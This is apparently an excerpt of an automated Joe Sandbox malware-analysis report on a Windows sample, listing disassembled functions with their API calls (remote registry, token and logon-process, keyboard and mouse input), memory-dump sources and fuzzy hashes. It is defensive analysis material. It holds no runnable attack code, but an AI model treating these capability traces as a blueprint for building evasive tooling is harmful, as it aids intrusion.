                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                            • String ID: RoInitialize$combase.dll
                                                                                                                                                                            • API String ID: 3489934621-340411864
                                                                                                                                                                            • Opcode ID: c03269bc41a7aba7f47063d996b28b121bc92fd32260d476850fc41c80b94529
                                                                                                                                                                            • Instruction ID: 7922241906ad5424682c09d576e0d4c30a1213c048f8169110e2b11d2194038f
                                                                                                                                                                            • Opcode Fuzzy Hash: c03269bc41a7aba7f47063d996b28b121bc92fd32260d476850fc41c80b94529
                                                                                                                                                                            • Instruction Fuzzy Hash: 79E012B0590B45DEDB206B70EC4DB153594BB71B02F504835B911D91E1D7B944AADF08
                                                                                                                                                                            Function 0048429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,004841B8), ref: 004842B8
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 004842BF
                                                                                                                                                                            • EncodePointer.KERNEL32(00000000), ref: 004842CA
                                                                                                                                                                            • DecodePointer.KERNEL32(004841B8), ref: 004842E5
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                            • String ID: RoUninitialize$combase.dll
                                                                                                                                                                            • API String ID: 3489934621-2819208100
                                                                                                                                                                            • Opcode ID: 78c775a0c15682f02ec0e498bdc309af79c2eecc0b9ee055aab87b4c272e0993
                                                                                                                                                                            • Instruction ID: dda16cbe53ddcbf2a27a1731d272311830862267cf3f70d8eca523c5e7ef04da
                                                                                                                                                                            • Opcode Fuzzy Hash: 78c775a0c15682f02ec0e498bdc309af79c2eecc0b9ee055aab87b4c272e0993
                                                                                                                                                                            • Instruction Fuzzy Hash: 6CE04678681305ABEB20AB20ED4DB153AA4BB25782F20843AF500E91A1CBB84559EF0C
                                                                                                                                                                            Function 004C675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memmove$__itow__swprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3253778849-0
                                                                                                                                                                            • Opcode ID: 90e4270b8b646b14ad7f8278f0e71b6f76be5bb1b7a18cc9afe12dd73596309f
                                                                                                                                                                            • Instruction ID: 74b1fac44e580df579304cf5832613d526cc93ba4d5b3ded2b3cc1180920da24
                                                                                                                                                                            • Opcode Fuzzy Hash: 90e4270b8b646b14ad7f8278f0e71b6f76be5bb1b7a18cc9afe12dd73596309f
                                                                                                                                                                            • Instruction Fuzzy Hash: 94618D7450025A9BCF11EF21CC81FFE37A8AF0570CF05851EF9555B292EA78AC46CB5A
                                                                                                                                                                            Function 004E046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00467F41: _memmove.LIBCMT ref: 00467F82
                                                                                                                                                                              • Part of subcall function 004E10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004E0038,?,?), ref: 004E10BC
                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004E0548
                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004E0588
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 004E05AB
                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 004E05D4
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 004E0617
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 004E0624
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4046560759-0
                                                                                                                                                                            • Opcode ID: b7baac0ddeb20e428c4020e79fcab3829617cfcb5a65bfdc5382e9de6ede1c1b
                                                                                                                                                                            • Instruction ID: 6c32bda3a77a21d52f2c60a76472f640b8f6947adbe0ddd772307b47b0cc5177
                                                                                                                                                                            • Opcode Fuzzy Hash: b7baac0ddeb20e428c4020e79fcab3829617cfcb5a65bfdc5382e9de6ede1c1b
                                                                                                                                                                            • Instruction Fuzzy Hash: 65517D31108240AFC710EF65C885E6FBBE8FF85318F04491EF595872A2DB79E945CB5A
                                                                                                                                                                            Function 004BF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004BF3F7
                                                                                                                                                                            • VariantClear.OLEAUT32(00000013), ref: 004BF469
                                                                                                                                                                            • VariantClear.OLEAUT32(00000000), ref: 004BF4C4
                                                                                                                                                                            • _memmove.LIBCMT ref: 004BF4EE
                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004BF53B
                                                                                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 004BF569
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1101466143-0
                                                                                                                                                                            • Opcode ID: 014e42564de3ebc491698fc2c0630d28effd7363326c760634992100fcaa655c
                                                                                                                                                                            • Instruction ID: ad59f7ab5d3e05a6c07833a6a30856b5ab523030e90e74c9b368e27cbe46780b
                                                                                                                                                                            • Opcode Fuzzy Hash: 014e42564de3ebc491698fc2c0630d28effd7363326c760634992100fcaa655c
                                                                                                                                                                            • Instruction Fuzzy Hash: 91516AB5A00209EFCB10CF58D880EAAB7B8FF4C314B15856AE959DB351D734E916CFA4
                                                                                                                                                                            Function 004C26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 004C2747
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004C2792
                                                                                                                                                                            • IsMenu.USER32(00000000), ref: 004C27B2
                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 004C27E6
                                                                                                                                                                            • GetMenuItemCount.USER32(000000FF), ref: 004C2844
                                                                                                                                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 004C2875
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3311875123-0
                                                                                                                                                                            • Opcode ID: 419e321c12fee826ff1bbf17facac275f786a994546c96080c4403d6708172cc
                                                                                                                                                                            • Instruction ID: b19d7c8d3b9fe884f7b0709700f098317e4dc57c91a672df4fe4b634866e5415
                                                                                                                                                                            • Opcode Fuzzy Hash: 419e321c12fee826ff1bbf17facac275f786a994546c96080c4403d6708172cc
                                                                                                                                                                            • Instruction Fuzzy Hash: F351B278900345EBDF64EF68CA88FAEBBF4AF44314F10466EE4119B291D7F88904CB65
                                                                                                                                                                            Function 00461765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00462612: GetWindowLongW.USER32(?,000000EB), ref: 00462623
                                                                                                                                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 0046179A
                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004617FE
                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 0046181B
                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0046182C
                                                                                                                                                                            • EndPaint.USER32(?,?), ref: 00461876
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1827037458-0
                                                                                                                                                                            • Opcode ID: 2c6c242cf6a6f3b3a90825c599a6c9f0089ba8338bfe788d51f429122e18e26e
                                                                                                                                                                            • Instruction ID: 5f926e7b8a66a5f7ed7f0af4c915235bf43ee043affc994e1e79f845515e2a95
                                                                                                                                                                            • Opcode Fuzzy Hash: 2c6c242cf6a6f3b3a90825c599a6c9f0089ba8338bfe788d51f429122e18e26e
                                                                                                                                                                            • Instruction Fuzzy Hash: 69419F70100340AFDB11DF25D884BB67BE8EF56724F08066AF9958B2B2D7349C4ADB66
                                                                                                                                                                            Function 004EB958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ShowWindow.USER32(005267B0,00000000,00D355D0,?,?,005267B0,?,004EB862,?,?), ref: 004EB9CC
                                                                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 004EB9F0
                                                                                                                                                                            • ShowWindow.USER32(005267B0,00000000,00D355D0,?,?,005267B0,?,004EB862,?,?), ref: 004EBA50
                                                                                                                                                                            • ShowWindow.USER32(00000000,00000004,?,004EB862,?,?), ref: 004EBA62
                                                                                                                                                                            • EnableWindow.USER32(00000000,00000001), ref: 004EBA86
                                                                                                                                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 004EBAA9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 642888154-0
                                                                                                                                                                            • Opcode ID: b2d00dc4f1f0a5d768f60ee629d3bea2abf2141b2ce93615f75bad9b4f78c7ab
                                                                                                                                                                            • Instruction ID: 4fb62ab8099a6979fe0d35457ada1b39c40bf7e2ed617b51a09f3d0a9c415951
                                                                                                                                                                            • Opcode Fuzzy Hash: b2d00dc4f1f0a5d768f60ee629d3bea2abf2141b2ce93615f75bad9b4f78c7ab
                                                                                                                                                                            • Instruction Fuzzy Hash: C0415470600181AFDB22CF55C489BA77BE1FB05315F1842BAEA488F3A3C735A845CB95
                                                                                                                                                                            Function 004D73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,004D5134,?,?,00000000,00000001), ref: 004D73BF
                                                                                                                                                                              • Part of subcall function 004D3C94: GetWindowRect.USER32(?,?), ref: 004D3CA7
                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 004D73E9
                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 004D73F0
                                                                                                                                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 004D7422
                                                                                                                                                                              • Part of subcall function 004C54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004C555E
                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 004D744E
                                                                                                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 004D74AC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4137160315-0
                                                                                                                                                                            • Opcode ID: a9ea667b03a4a03db7c3430107128aa45ef55600102d3950c1b135378211344c
                                                                                                                                                                            • Instruction ID: b4d3e710f3e4ac54913f6542d1400dca8b1f1017e7059a73261146677a8bc0eb
                                                                                                                                                                            • Opcode Fuzzy Hash: a9ea667b03a4a03db7c3430107128aa45ef55600102d3950c1b135378211344c
                                                                                                                                                                            • Instruction Fuzzy Hash: 6831F432508345ABC720DF14C849F5BBBA9FF88318F00092EF48897292D674E949CB96
                                                                                                                                                                            Function 004B8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004B85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004B8608
                                                                                                                                                                              • Part of subcall function 004B85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004B8612
                                                                                                                                                                              • Part of subcall function 004B85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004B8621
                                                                                                                                                                              • Part of subcall function 004B85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004B8628
                                                                                                                                                                              • Part of subcall function 004B85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004B863E
                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000000,004B8977), ref: 004B8DAC
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004B8DB8
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004B8DBF
                                                                                                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 004B8DD8
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,004B8977), ref: 004B8DEC
                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 004B8DF3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3008561057-0
                                                                                                                                                                            • Opcode ID: 0b1403cbd20c73dc997feb34eed333ead3a00fd46aeac818b2e954a14200da94
                                                                                                                                                                            • Instruction ID: 7d850d8f73e854d1a5d41ff543dd99d6dbac203e926394322a1d0b90c70f4d09
                                                                                                                                                                            • Opcode Fuzzy Hash: 0b1403cbd20c73dc997feb34eed333ead3a00fd46aeac818b2e954a14200da94
                                                                                                                                                                            • Instruction Fuzzy Hash: 1B119D31500605FBDB109B64CC49BEFB76DEF55316F10442EE84597291CB399904CB68
                                                                                                                                                                            Function 004B8AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004B8B2A
                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004B8B31
                                                                                                                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004B8B40
                                                                                                                                                                            • CloseHandle.KERNEL32(00000004), ref: 004B8B4B
                                                                                                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004B8B7A
                                                                                                                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 004B8B8E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1413079979-0
                                                                                                                                                                            • Opcode ID: 27175c5176e637dbdb5dcfc08814fa5dcb27d525fbaceb4fa912517ea8c2ea40
                                                                                                                                                                            • Instruction ID: 25c7f5fccfb7ea0e8836cb0d601b3ba9220f62d51b390ca438f5512fa3da728e
                                                                                                                                                                            • Opcode Fuzzy Hash: 27175c5176e637dbdb5dcfc08814fa5dcb27d525fbaceb4fa912517ea8c2ea40
                                                                                                                                                                            • Instruction Fuzzy Hash: D2116AB2504249ABDB018FA4EC49FDA7BADEF08304F044069FE04A6161C776AE64DB64
                                                                                                                                                                            Function 004EC19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004612F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0046134D
                                                                                                                                                                              • Part of subcall function 004612F3: SelectObject.GDI32(?,00000000), ref: 0046135C
                                                                                                                                                                              • Part of subcall function 004612F3: BeginPath.GDI32(?), ref: 00461373
                                                                                                                                                                              • Part of subcall function 004612F3: SelectObject.GDI32(?,00000000), ref: 0046139C
                                                                                                                                                                            • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 004EC1C4
                                                                                                                                                                            • LineTo.GDI32(00000000,00000003,?), ref: 004EC1D8
                                                                                                                                                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 004EC1E6
                                                                                                                                                                            • LineTo.GDI32(00000000,00000000,?), ref: 004EC1F6
                                                                                                                                                                            • EndPath.GDI32(00000000), ref: 004EC206
                                                                                                                                                                            • StrokePath.GDI32(00000000), ref: 004EC216
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 43455801-0
                                                                                                                                                                            • Opcode ID: 8baecc086fd684e83e4e5076b9faa16c26c09e9aa77f172e2b630fe7c791dd4c
                                                                                                                                                                            • Instruction ID: 9c5fa6e999334859bb0e50b90c0d56e1cf496213458f60d1e3c3b89eafd4b852
                                                                                                                                                                            • Opcode Fuzzy Hash: 8baecc086fd684e83e4e5076b9faa16c26c09e9aa77f172e2b630fe7c791dd4c
                                                                                                                                                                            • Instruction Fuzzy Hash: 10115B7640014CFFDF119F91DC88EAA7FADEF08354F048066BA084A162D7719E59DBA4
                                                                                                                                                                            Function 004803A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 004803D3
                                                                                                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 004803DB
                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004803E6
                                                                                                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004803F1
                                                                                                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 004803F9
                                                                                                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00480401
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
